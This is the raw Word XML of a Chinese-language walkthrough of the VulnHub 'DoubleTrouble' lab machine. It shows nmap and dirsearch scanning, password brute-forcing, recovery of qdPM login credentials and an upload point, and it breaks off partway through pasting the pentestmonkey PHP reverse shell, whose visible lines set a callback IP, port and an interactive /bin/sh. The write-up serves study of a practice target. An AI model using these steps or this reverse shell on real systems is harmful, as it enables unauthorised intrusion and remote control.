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429FB" w14:textId="01F2CA40" w:rsidR="00853C24" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1DBB">
        <w:t>oubletrouble</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE70FD" w14:textId="33036D22" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="005D4212">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/doubletrouble-1,743/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69E62D21" w14:textId="77777777" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB"/>
    <w:p w14:paraId="45388781" w14:textId="414BD377" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB"/>
    <w:p w14:paraId="71A7DA5A" w14:textId="1A4578E1" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFFC2D" w14:textId="16579E62" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:t>arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7AC80" w14:textId="53398B61" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61A4DF9A" wp14:editId="00AB29DA">
            <wp:extent cx="5274310" cy="1369695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="975165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65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971B" w14:textId="5579E5D3" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF674C1" w14:textId="7BDF88D4" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:t>nmap --min-rate 1000 -p- 192.168.21.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C6597" w14:textId="593A9418" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37504C4A" wp14:editId="1E8B781E">
            <wp:extent cx="4869602" cy="1897544"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1186032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32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DF31" w14:textId="7DEC6628" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB57F9" w14:textId="06A42E09" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:t>nmap -sV -sT -O -p22,80 192.168.21.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151E8EF" w14:textId="7F25D610" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69920EA8" wp14:editId="252A2E35">
            <wp:extent cx="5274310" cy="2065655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="796408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08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666E" w14:textId="4AC6A342" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E19ECF5" w14:textId="57EA9257" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:t>nmap --script=vuln -p22,80 192.168.21.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD92982" w14:textId="0E2CABE1" w:rsidR="00FF1DBB" w:rsidRDefault="00FF1DBB">
      <w:r w:rsidRPr="00FF1DBB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0639726C" wp14:editId="1DD9994C">
            <wp:extent cx="5274310" cy="3601085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1129835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35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先去看看web页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F789F4" w14:textId="77B4BF2A" w:rsidR="00FF1DBB" w:rsidRDefault="00B94F2B">
      <w:r w:rsidRPr="00B94F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C16A5B1" wp14:editId="0626D329">
            <wp:extent cx="5274310" cy="3905885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1166652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52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7CE2" w14:textId="4B3629A8" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里使用的是qdpm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D827DA0" w14:textId="32A2B6A4" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找一下漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D876D25" w14:textId="25447B62" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r w:rsidRPr="00B94F2B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485B74AE" wp14:editId="2ADC906A">
            <wp:extent cx="5274310" cy="1633220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="784858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58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6D23" w14:textId="11AD0072" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来弄一下网站的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B135F" w14:textId="1F057C2E" w:rsidR="00B94F2B" w:rsidRPr="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r w:rsidRPr="00B94F2B">
        <w:t xml:space="preserve">dirsearch -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00B94F2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.21.151</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01F0D87A" w14:textId="6A5ABC4B" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r w:rsidRPr="00B94F2B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F680E8" wp14:editId="1C27E286">
            <wp:extent cx="5274310" cy="6732905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1683208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081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85DD" w14:textId="4412D3D6" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找一下不是模板的文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B2B9B" w14:textId="47D54427" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r w:rsidRPr="00B94F2B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206206E1" wp14:editId="39CB299A">
            <wp:extent cx="5274310" cy="3844925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="816327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275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F2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA45718" wp14:editId="4AAE2622">
            <wp:extent cx="4816257" cy="3360711"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2101165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65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714A" w14:textId="591A202E" w:rsidR="00B94F2B" w:rsidRDefault="00B94F2B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>估计要从这个图片入手了，先下载下来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A053E" w14:textId="2A7B66F8" w:rsidR="00B94F2B" w:rsidRDefault="004C1076">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1076">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B2A12D5" wp14:editId="67D1141E">
            <wp:extent cx="5274310" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1896775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753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75BC" w14:textId="257E4748" w:rsidR="00B94F2B" w:rsidRDefault="004C1076">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>文件西安基础的看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E6D4E" w14:textId="7576C2B6" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r w:rsidRPr="004C1076">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6818B933" wp14:editId="7F7A6396">
            <wp:extent cx="5274310" cy="535305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1540235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35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9A08" w14:textId="5742D584" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r w:rsidRPr="004C1076">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A05FC20" wp14:editId="63516396">
            <wp:extent cx="5274310" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="376342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429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7053" w14:textId="5B9E26A9" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用一下新的工具试试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30238438" w14:textId="15E0DEB2" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r w:rsidRPr="004C1076">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ECC126D" wp14:editId="7D749A62">
            <wp:extent cx="5274310" cy="6727825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="882278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78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A9D5" w14:textId="52686712" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r w:rsidRPr="004C1076">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A46F3C9" wp14:editId="5F031C1E">
            <wp:extent cx="4092295" cy="640135"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="498615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157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CEC3" w14:textId="347B0BA1" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319628C6" w14:textId="2F50F19F" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就爆破一下看看行不行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E0F6A" w14:textId="278588DF" w:rsidR="004C1076" w:rsidRDefault="004C1076">
      <w:r w:rsidRPr="004C1076">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48E0A73B" wp14:editId="0C73C9BF">
            <wp:extent cx="5274310" cy="4107815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1396340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408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7559" w14:textId="158929C5" w:rsidR="004C1076" w:rsidRDefault="002740A1">
      <w:r w:rsidRPr="002740A1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A141520" wp14:editId="6CF8E582">
            <wp:extent cx="5274310" cy="1193800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1929390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900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356B" w14:textId="29EA4604" w:rsidR="002740A1" w:rsidRDefault="002740A1">
      <w:r w:rsidRPr="002740A1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8CDC93" wp14:editId="05F6B412">
            <wp:extent cx="3764606" cy="815411"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="164831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17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7D4A" w14:textId="02189D90" w:rsidR="002740A1" w:rsidRDefault="002740A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03846E9E" w14:textId="0A6A8443" w:rsidR="002740A1" w:rsidRDefault="002740A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去看看这个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20672708" w14:textId="7F665DE7" w:rsidR="002740A1" w:rsidRDefault="002740A1">
      <w:r w:rsidRPr="002740A1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152D5AFC" wp14:editId="080836F7">
            <wp:extent cx="2522439" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1585913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137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2041" w14:textId="5F66EE7E" w:rsidR="002740A1" w:rsidRDefault="002740A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个就是登入的账号密码了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DCCFB9" w14:textId="34CA57DA" w:rsidR="002740A1" w:rsidRDefault="00D917D3">
      <w:r w:rsidRPr="00D917D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="519911F2" wp14:editId="59BFCB8B">
            <wp:extent cx="5274310" cy="4356735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="232818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183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AC49" w14:textId="56264F50" w:rsidR="00D917D3" w:rsidRDefault="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现上传点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ED0E42" w14:textId="0E678220" w:rsidR="00D917D3" w:rsidRDefault="00D917D3">
      <w:r w:rsidRPr="00D917D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F7B6EE" wp14:editId="19137D3A">
            <wp:extent cx="5274310" cy="2230120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="729347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471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774D" w14:textId="0299596F" w:rsidR="00D917D3" w:rsidRDefault="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就简单的找一个reverse吧，网上随便找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EB6E1" w14:textId="5C5F5603" w:rsidR="00D917D3" w:rsidRDefault="00D917D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>反弹shell脚本（php-reverse-shell）_落寞的魚丶的博客-CSDN博客</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B66180E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5920D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// php-reverse-shell - A Reverse Shell implementation in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0C2B4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Copyright (C) 2007 pentestmonkey@pentestmonkey.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A6641" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1B6FD" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// This tool may be used for legal purposes only.  Users take full responsibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5C68D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// for any actions performed using this tool.  The author accepts no liability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEE35E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>// for damage caused by this tool.  If these terms are not acceptable to you, then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5664F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// do not use this tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062EAC0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD47994" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// In all other respects the GPL version 2 applies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48F497" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC05D1" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// This program is free software; you can redistribute it and/or modify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD80F47" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// it under the terms of the GNU General Public License version 2 as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACEBCEE" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// published by the Free Software Foundation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832E1C2" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BAD84" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// This program is distributed in the hope that it will be useful,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C52DA" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// but WITHOUT ANY WARRANTY; without even the implied warranty of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD37459" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1423748B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// GNU General Public License for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3AB5CA" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CD02F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// You should have received a copy of the GNU General Public License along</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB980E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// with this program; if not, write to the Free Software Foundation, Inc.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F52A07" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025A1953" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A4344" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// This tool may be used for legal purposes only.  Users take full responsibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344377CD" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// for any actions performed using this tool.  If these terms are not acceptable to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57B3C4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// you, then do not use this tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9813D6" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3DC3F8" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// You are encouraged to send comments, improvements or suggestions to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93E906" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// me at pentestmonkey@pentestmonkey.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F3C42" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149788D8" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14698A48" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEAAE65" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// This script will make an outbound TCP connection to a hardcoded IP and port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931220C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// The recipient will be given a shell running as the current user (apache normally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF3F988" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8A1B6" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34208BA6" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A328C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// proc_open and stream_set_blocking require PHP version 4.3+, or 5+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39921D7F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582558C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418AF7A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210D06F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A19087D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// -----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D679F45" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55D748" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="2730CE5B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>set_time_limit (0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166953CD" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$VERSION = "1.0";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C091AC" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$ip = '127.0.0.1';  // CHANGE THIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A16826" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$port = 1234;       // CHANGE THIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52254C86" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$chunk_size = 1400;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF59EE5" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$write_a = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DDBED0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$error_a = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEE02B7" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$shell = 'uname -a; w; id; /bin/sh -i';</w:t>
      </w:r>
    </w:p>
